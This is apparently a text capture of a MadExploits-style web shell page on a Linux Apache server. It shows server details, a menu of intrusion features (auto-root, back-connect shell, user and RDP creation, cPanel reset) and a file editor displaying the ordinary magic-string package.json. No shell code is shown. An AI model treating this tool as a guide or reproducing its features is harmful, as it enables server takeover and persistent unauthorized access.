Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
magic-string /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
LICENSE
1.03
KB
-rw-r--r--
README.md
11.83
KB
-rw-r--r--
package.json
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "magic-string", "version": "0.30.12", "packageManager": "pnpm@9.6.0", "description": "Modify strings, generate sourcemaps", "keywords": [ "string", "string manipulation", "sourcemap", "templating", "transpilation" ], "repository": "https://github.com/rich-harris/magic-string", "license": "MIT", "author": "Rich Harris", "main": "./dist/magic-string.cjs.js", "module": "./dist/magic-string.es.mjs", "jsnext:main": "./dist/magic-string.es.mjs", "types": "./dist/magic-string.cjs.d.ts", "exports": { "./package.json": "./package.json", ".": { "import": "./dist/magic-string.es.mjs", "require": "./dist/magic-string.cjs.js" } }, "files": [ "dist/*", "index.d.ts", "README.md" ], "scripts": { "build": "rollup -c", "changelog": "conventional-changelog -p angular -i CHANGELOG.md -s", "format": "prettier --single-quote --print-width 100 --use-tabs --write src/*.js src/**/*.js", "lint": "eslint src test && publint", "lint:fix": "eslint src test --fix", "prepare": "npm run build", "prepublishOnly": "npm run lint && rm -rf dist && npm test", "release": "bumpp -x \"npm run changelog\" --all --commit --tag --push && npm publish", "pretest": "npm run build", "test": "mocha", "bench": "npm run build && node benchmark/index.mjs", "watch": "rollup -cw" }, "devDependencies": { "@rollup/plugin-node-resolve": "^15.2.3", "@rollup/plugin-replace": "^5.0.7", "benchmark": "^2.1.4", "bumpp": "^9.4.1", "conventional-changelog-cli": "^3.0.0", "eslint": "^8.57.0", "mocha": "^10.7.0", "prettier": "^3.3.3", "publint": "^0.2.9", "rollup": "^3.29.4", "source-map-js": "^1.2.0", "source-map-support": "^0.5.21" }, "dependencies": { "@jridgewell/sourcemap-codec": "^1.5.0" } }
Close